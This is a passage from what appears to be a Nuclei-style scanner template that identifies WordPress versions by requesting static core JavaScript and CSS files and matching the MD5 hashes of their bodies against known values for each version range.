type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"3c16bfa9df88e42ccd3756bec32fe937\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"1e6e025c21f675863bc8afbd6b713386\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"d23d7a162d5b1427fe16b04689041981\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"f56147d75a8ff4d0a9a62f88a5203d9a\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"f303c21d68b4ebff99aab2df75f81db9\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"e1d64d4023fe0facd55ee1600b50a15f\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"5cf4c4c0250888b7b97e1536f82bea01\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"7480780b3eca41e4e7e4a3fe6c63d43e\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"93ce03b7394bab13fc1bb343d87f00d2\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"97312b01a5aa72fef38a41da963abb49\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"0405cc7848d59145b6953e7fd9b1c419\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"b78b87670b43888624a5600101dc32c3\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"f51e509e450fe740e3295f175071b240\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"702d78113dd95f8b0bb2df8cb3192a3a\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"3387b2ca93f4eff740390930774cd4d2\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"039e69bcf2d3f162058b581e6430d0c9\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"e57cfccfba6062793096ebad5b2ed81c\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"3fb79dd105267303559830d7a93ae645\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/autosave.min.js" - matchers: - - type: dsl - name: 4.7 - 5.2.9 - dsl: - - "(\"c2366b7de7027d09661ecdde0c8d1025\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"0ad41a39a5590a02c5689f379b97afad\" == md5(body))" - - type: dsl - name: 4.4.1 - 4.5.23 - dsl: - - "(\"9f6cbf92fd682f09be0c265804c9ab67\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"5e1ea0845232846c1907d9fe70864d23\" == md5(body))" - - type: dsl - name: 4.1 - 4.3.25 - dsl: - - "(\"2eec8f2c408c881c6715ce0f682f3707\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"e4a56f032409c33f96d20ecfaed223e6\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"b5f51dcf394c4611b05725837d18dc2b\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"ca350f05d29aefd91692725945c944fa\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"d170f66997bf4dd0a595354633129133\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"7f88619a2907adba7943d1f3ff47b63b\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"0a5377f0fedb60c22a9d918cfd4e91ac\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"1ea6e59d88f83106e2ae3aff299d35df\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"aed85e244029fd1915a00f757c1a83ea\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"5ea21828b317f9b2ed50a6eef99afc46\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"0c1c912e31c1c4523af949b0a10608e9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wplink.min.js" - matchers: - - type: dsl - name: 4.8.2 - 5.0.2 - dsl: - - "(\"5c8ce7c9fc66234e60742bf8d3cf2ffb\" == md5(body))" - - type: dsl - name: 4.8 - 4.8.1 - dsl: - - "(\"06ddc3571523ab44448ba3566ea9e2d8\" == md5(body))" - - type: dsl - name: 4.7.6 - 4.7.19 - dsl: - - "(\"cff6fcc5b70652ee476588bc20884511\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.5 - dsl: - - "(\"59b4b46ffe146371aae9fcc50c7e1930\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"18f38030b7acd35250c60fe80ab73699\" == md5(body))" - - type: dsl - name: 4.6.7 - 4.6.20 - dsl: - - "(\"a3119f33e453860200fbacb09474f51e\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.6 - dsl: - - "(\"951dc23f64588e89e7dd9c13661a473d\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.9 - dsl: - - "(\"219a7c4fdeec0aef6655934410a5a587\" == md5(body))" - - type: dsl - name: 4.5.10 - 4.5.23 - dsl: - - "(\"ae3b50794ddcc3df84812d0cbc2855d4\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.10 - dsl: - - "(\"48078b35c0f544d16d7555da33ed6452\" == md5(body))" - - type: dsl - name: 4.4.11 - 4.4.24 - dsl: - - "(\"7d0ceb00ca46b627c036f834c7edd58a\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.11 - dsl: - - "(\"5318022592bd8ec613a3ec32e68d47e9\" == md5(body))" - - type: dsl - name: 4.3.12 - 4.3.25 - dsl: - - "(\"e0e239a4e8242880ed2d964e7a299579\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.15 - dsl: - - "(\"ce9cca5e1367cd6f5d4471f5604a4d69\" == md5(body))" - - type: dsl - name: 4.2.16 - 4.2.29 - dsl: - - "(\"474111b726b62007e9b5601b8d2f81bf\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.18 - dsl: - - "(\"1ca4d589307f12d1cb208a33e539ed23\" == md5(body))" - - type: dsl - name: 4.1.19 - 4.1.32 - dsl: - - "(\"3d2de6e6f70baf2d755cdc9c153474f0\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.18 - dsl: - - "(\"7d6840b991b131e9d5469c4b3fa912ba\" == md5(body))" - - type: dsl - name: 4.0.19 - 4.0.32 - dsl: - - "(\"a41d935025d74367609f773af6e31702\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.19 - dsl: - - "(\"5bae92ed3e8c6ee6ea8cc4e9c51efe27\" == md5(body))" - - type: dsl - name: 3.9.20 - 3.9.33 - dsl: - - "(\"67e7be5e708bcfc2f2d3cd31ed6f4c9c\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.21 - dsl: - - "(\"aa873353bbf46d2bcee1cc0ae2e9ebd0\" == md5(body))" - - type: dsl - name: 3.8.22 - 3.8.33 - dsl: - - "(\"a80a3c351b5307e73a9efa09e35f378f\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.21 - dsl: - - "(\"c9d7f5943044ff3a3a341c077ae58a42\" == md5(body))" - - type: dsl - name: 3.7.22 - 3.7.33 - dsl: - - "(\"d9e99f88c210e4e9b1ef2a508305705a\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"eb662536068707c335019d38236b441c\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"e532ee2cba4f82923a406d04a69827f2\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"caec3c62a9d482aea3a07473ba2fc765\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"e4c3fca615d78a5b856fa3ebbb4c676c\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"067b1858667ec737ba52026e37c22f77\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"f8a60311599ef36778d88259b9f3e9d2\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"b8124af933079872677671b4a77c8fe8\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"ddbfbec2edb0270430e1546d0df08fa6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/custom-background.min.js" - matchers: - - type: dsl - name: 4.7 - 5.2.7 - dsl: - - "(\"351f2eef1d5033d68e8982ea86167e3f\" == md5(body))" - - type: dsl - name: 3.7.34 - 4.6.19 - dsl: - - "(\"82d07f23593e578820b19fc9faad65a0\" == md5(body))" - - type: dsl - name: 3.7 - 3.8.33 - dsl: - - "(\"c0a9906e080e0d00b148d2353b5d6863\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"2efa9ea39be6f21776bf7ce5c28a094b\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.4 - dsl: - - "(\"5442cfbbb1ab1df7b84357bed44a6d10\" == md5(body))" - - type: dsl - name: 5.4 - 5.5.1 - dsl: - - "(\"722661f3c458461e17f42ccb91d6d951\" == md5(body))" - - type: dsl - name: 5.4.3 - 5.6 - dsl: - - "(\"d9683ebc4fbcb974777935504c5b9680\" == md5(body))" - - type: dsl - name: 5.3.5 - 5.3.6 - dsl: - - "(\"ba771cf596a7fd154c43ea99e94b5083\" == md5(body))" - - type: dsl - name: 4.7.19 - 5.2.9 - dsl: - - "(\"1a4848edc676cde4a347a6a1ef1477cd\" == md5(body))" - - type: dsl - name: 3.7.35 - 4.6.20 - dsl: - - "(\"b8dab1edb309a4b7e21dead64991eaa5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/media-gallery.min.js" - matchers: - - type: dsl - name: 3.7 - 5.2.7 - dsl: - - "(\"3296d1fa20d292b002bba10490f1ba6e\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"75e959d883beb502e661572dd86d84f3\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.4 - dsl: - - "(\"53b0f902ba530b9ebfc3716ff006c8a4\" == md5(body))" - - type: dsl - name: 5.4 - 5.5.1 - dsl: - - "(\"6aa020f29b4e78387028621dc2a1e987\" == md5(body))" - - type: dsl - name: 5.4.3 - 5.6 - dsl: - - "(\"aac04f629735f75726bbc0ea482c7884\" == md5(body))" - - type: dsl - name: 5.3.5 - 5.3.6 - dsl: - - "(\"1b6e81c7b603c050ecba93b522283460\" == md5(body))" - - type: dsl - name: 3.7.35 - 5.2.9 - dsl: - - "(\"1dcf2019c086d731dc3793a0c5afb7b0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/inlite/theme.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"bf1d945945d6748aad3efed41f3f12ef\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"072d29e6b3b22ef87ec8af8a3a79b924\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"cc88f336999397d383b5fa434294a258\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"9e675131dcae21250f65f02d43c3b73b\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"6c33490636e4a429f5388481fdc21921\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"c5e532252df4da20a8fc47f2398ae693\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"68c854763f6bd132b1cc20f6e0d1e970\" == md5(body))" - - type: dsl - name: 5.1 - 5.2 - dsl: - - "(\"9cba2d62377b91304375c96226eba843\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"ebd38a888450ac2bffe8115c8db03481\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"7b481194bebb48661b83a258e3ff090e\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"e25a3d100d6f3c33a4a145d0ed1e16c2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/inlite/theme.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"9176de33c606c8c9b43fe11ecf01439f\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"ff6758c8f83385d2e839e15e12463720\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"fb14698a360d5a3d7857397104fc556c\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"11a18378a9afa362204054b59b618b16\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"0708be140b906ad238f8080afd1fd280\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"45eb0273b92eb8cd42cf66d44e2492fb\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"1fb22dab6ed32deabfed237aad759e24\" == md5(body))" - - type: dsl - name: 5.1 - 5.2 - dsl: - - "(\"77930c82ebe7bc5fb285ef8145e95c9d\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"e41a93fa397a59a3805d4271592a6d40\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"f51c77b5905ab12e3ef9c3c2259afcc3\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"344f1ce0e24412496360e1181995454a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/lists/plugin.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"20e9f3b6a4a72b77a6d2c5679542dff6\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"c9262830210151ba3773c4ad358067ac\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"c5646744ede702b668fb314569b37a51\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"00cb28ee11a26c67b2e1092341f6f667\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"e3242c88652b5f2bb64d04bd32672ef1\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"65001a3642b354f8a1ac6b71c832ecda\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"6bdcee3180998f7f8e13dc4917d8f9a9\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"279a5b0bf93f8d81288dfbd117b6c77c\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"826477563d7d3beb97e98c65259436be\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"9c7b5c4ee1505c256faaaa7fe64b4dfd\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"2c8d42c1cf6305ee4da6c9a8f1ae3a5a\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"f22019286074a87a7191766c89c4cfab\" == md5(body))" - - type: dsl - name: 5.1 - 5.2 - dsl: - - "(\"5d19da0a2153ae26cff3c6263d0e2b89\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"aac38cc02ba368de90157c29049151a3\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"1d6d5af175dd06021d60cf5d02856c67\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"32b438beb73a7396a577bc39e74a8fa3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/wp-plupload.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"7c74a0f866c5dfd1dc9a45474651f6ef\" == md5(body))" - - type: dsl - name: 4.1 - 4.5.23 - dsl: - - "(\"1d8eb51f53f479c82c6c660f7f40ad40\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"35e463dbb829b4142c4baf52693035a0\" == md5(body))" - - type: dsl - name: 3.7 - 3.8.33 - dsl: - - "(\"80fca05c0bb63230df94b9868cc5fd30\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"7a89e68c14d7d560251a55cdd2717047\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"cc93057ecab25b3d7ea1385cf9475654\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.8.35 - dsl: - - "(\"226e874723ff74a09b8ce66eacbaefbe\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"3c2d355486c2165d31202b840ac78597\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/lodash.min.js" - matchers: - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"62acde2a2687c63954bee264a1a2f86d\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"bc0594c54450e8ac689739b6b198067a\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"913a2917447f6e4243fc9ffe398ad00e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/lodash.js" - matchers: - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"07ec8c63dfd89bcdb33f8bd14f4f8db8\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"050c900c28ad5d8275ff56f63b05becb\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"326ebe421b32d7cfe7015d83e7f7208e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"34800de78944cc6cf21ac3c61cd7df03\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"e506e7cb42244f39a47e21f4eada7421\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"5981cc4115225a71e097cef30b55df71\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"3745d97e3f5618ffd6ac8e7f916fca42\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"6926951583064a4532a7819f624c7756\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"686c7af3cc4a1474646963751a4a5a7e\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"7d2ef4bb244bac8a81d13ef4382d168e\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"5090bae2c114802440412e301bdf5174\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/content.inline.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"4e0b29837fad1438a92fd0f27c43db68\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"07cb8d19850cdf59cd8aa2ba8d3ecca8\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.3 - dsl: - - "(\"9651c10838a77fb4cca900b47d9d331c\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.4.24 - dsl: - - "(\"35b20a1298ab637a58ac70fa73df335c\" == md5(body))" - - type: dsl - name: 4.2 - 4.3 - dsl: - - "(\"5b10ce987c2e7a6ccb8f2e8e197dd5ac\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"564275703d82fa3ba9b199743730c06b\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"e438b17739e7dea20da625c54590c83d\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"9c96643398461b53ec9c5d2085434a2d\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"67300742f2ebd668e53c3935f4a80964\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.4.4 - dsl: - - "(\"0de56511864c9de2a5cdb878010fc550\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"8b026c6f37d6037237397741ac55c945\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/content.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"2f9c65ecc50238c129c9db06f7d1b0de\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"a163c2a2e85d1c363e181b3c57f30d8a\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.3 - dsl: - - "(\"a1207b432127ddc0c383acfb711b5a78\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.4.24 - dsl: - - "(\"b7c6c39dbee52e316139d6f41ec805ca\" == md5(body))" - - type: dsl - name: 4.2 - 4.3 - dsl: - - "(\"6f53d570185a3510ecd0c79b34be53d0\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"7a782b3c28c8d32904c8caffe5d764ad\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"3fa0e763ae7456564829fa3e439c46f1\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"9b7df826ce7465aac717f19eca8cfd3b\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"8e445bfdef94a7238354f616c071602a\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.4.4 - dsl: - - "(\"0be8f6d47b7eb85f49cbb5b54feb4b40\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"95a2955c501549fdc9a5d8d83c5c88b9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/compat3x/css/dialog.css" - matchers: - - type: dsl - name: 4.6 - 5.4.4 - dsl: - - "(\"e5313168fb2b657a4bd2f5e06b931a22\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"96b3a37270049ad482e5e0b14b2bff89\" == md5(body))" - - type: dsl - name: 3.9 - 4.2.29 - dsl: - - "(\"97ddcd95d500418cd2114974ff644812\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"aa77790f42e50f03b4ef956fc37cedd8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/coffee/colors.scss" - matchers: - - type: dsl - name: 3.9 - 5.4.4 - dsl: - - "(\"397e3820b27a234330c95e05250f61ce\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"e78e27aed68950c946a06a541ffa4ba7\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"215144fe0268ea34a511e791078fe8f3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/ocean/colors.scss" - matchers: - - type: dsl - name: 3.9 - 5.4.4 - dsl: - - "(\"1a7c5bfd9faf7f6cc77cd9b166062568\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"c52397b9dadfeb85c77059e70dd28b65\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"84b7aaf89eecd756f42a2c5e622a249a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/moment.min.js" - matchers: - - type: dsl - name: 5.0 - 5.4.4 - dsl: - - "(\"8999b8b5d07e9c6077ac5ac6bc942968\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"ab123abdffebc1fbd885949213b13f57\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/moment.js" - matchers: - - type: dsl - name: 5.0 - 5.4.4 - dsl: - - "(\"6722aa945b6577eda74330383105557f\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"e70a748e7cf42733bf14fa2030bd84ae\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/set-post-thumbnail.js" - matchers: - - type: dsl - name: 3.8 - 5.0.11 - dsl: - - "(\"2b5153576d1eee4002fb7ed9e5831251\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"c6d8c11219599e48d32cb3dbefe43d29\" == md5(body))" - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"62151e11b251bdda2295d9a8105e782a\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"e232c49b84f1291a9ce6468bfb114f1a\" == md5(body))" - - type: dsl - name: 5.1 - 5.4.4 - dsl: - - "(\"4e8d87c996953d8e9566e682ba348441\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"3a314eb02806e8786c018f58ddfcbf27\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-backbone.js" - matchers: - - type: dsl - name: 4.5 - 4.8.15 - dsl: - - "(\"ff08a91eba7f4fb95be7d5eb4a072d76\" == md5(body))" - - type: dsl - name: 3.9 - 4.4.24 - dsl: - - "(\"fdaba653baf259db7cb3d7a4d76a2970\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"066899e5caeb819e6fa0422c3ce92fbd\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"65105a0048efed09300417b61ad18cc9\" == md5(body))" - - type: dsl - name: 5.1 - 5.4.4 - dsl: - - "(\"ba62f36757662e2bb4585c05dedfd070\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"04afd74a8cae5409bbe26cd951cbc231\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/deprecated-media-rtl.min.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"ac5bc02b710e35115cadca960308560c\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"f6195709d41e1547898d1bd075091a4c\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"11bce99ac6be4fc46b9510278de3365a\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"017b6102507494583f9241b9f8854959\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"74413a2404aadd63114f75e93d4e54c3\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"385c6e9e75a08fbd280447c4190d7233\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"2053b840e7091a03d9212f6eeaceab78\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"76e634724a9a1282e287a4d89da142a1\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"ae51dff82ed4709e6460661d4999aea8\" == md5(body))" - - type: dsl - name: 5.1 - 5.4.4 - dsl: - - "(\"f341cc91db43d556d8573cddc05e1ab4\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"8952f7183f83e9f988df6cfab381e57d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/deprecated-media.min.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"b1cc8030eb9a806f2fa3a4aeecdac87c\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"553fc5dcdad1a950968fd3889dd0798a\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"3fe617931e6f3e488d120de15875f696\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"625227ce35e802591f85a974db531d36\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"aef5bd3a2b515ab84f6e9fff6a7d4b15\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"c3b492ce52736917c0e7fd620a314036\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"bdf6c67b381490a4ecc8a12e0121b8cb\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"598fe37b999d9392bec5d439430a4447\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"87fe11509d4e425db64abd2e0394d4ef\" == md5(body))" - - type: dsl - name: 5.1 - 5.4.4 - dsl: - - "(\"d500c620b7f00683bef8e6b579f621f7\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"5c0576d5df98fe54a147c7a9682b3735\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/_variables.scss" - matchers: - - type: dsl - name: 4.2 - 5.1.8 - dsl: - - "(\"3ab501096b1a091972d84c85b284135a\" == md5(body))" - - type: dsl - name: 3.8 - 4.1.32 - dsl: - - "(\"769f771a3f3fdb68e59c9c71b0a7baab\" == md5(body))" - - type: dsl - name: 5.2 - 5.3 - dsl: - - "(\"719b571cacd7a1e140377a7a3ecf8cd4\" == md5(body))" - - type: dsl - name: 5.3.1 - 